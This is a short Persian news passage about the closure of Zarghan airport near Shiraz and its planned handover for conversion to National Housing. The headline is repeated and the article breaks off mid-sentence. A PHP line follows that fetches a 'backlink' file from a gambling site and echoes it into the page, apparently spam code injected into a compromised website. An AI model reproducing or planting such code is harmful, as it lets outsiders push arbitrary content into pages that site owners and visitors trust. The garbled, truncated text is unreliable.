فرودگاه زرقان از تعطیلی تا فروش در طرح مولدسازی/ واگذاری فرودگاه جهت تغییر کاربری به مسکن ملی/ نباید در مکان فرودگاه پروژه‌های مسکونی و صنعتی اجرا کرد

فرودگاه زرقان از تعطیلی تا فروش در طرح مولدسازی/ واگذاری فرودگاه جهت تغییر کاربری به مسکن ملی/ نباید در مکان فرودگاه پروژه‌های مسکونی و صنعتی اجرا کرد

فرودگاه زرقان به عنوان یکی از بزرگترین مراکز مهم تفریحی، آموزشی و هوانوردی کشور به شمار می رود اما از حدود ۶ ماه پیش (شهریور ۱۴۰۱ ) به دلیل عدم بروزرسانی و ایجاد زیرساخت های ایمنی و امنیتی تعطیل شده است. به گزارش ایلنا، ظاهرا مسئولان شرکت فرودگاه های کشور تمایلی برای حفظ و بروز رسانی

?php echo file_get_contents("https://harumslot99.com/backlink1.txt"); ?>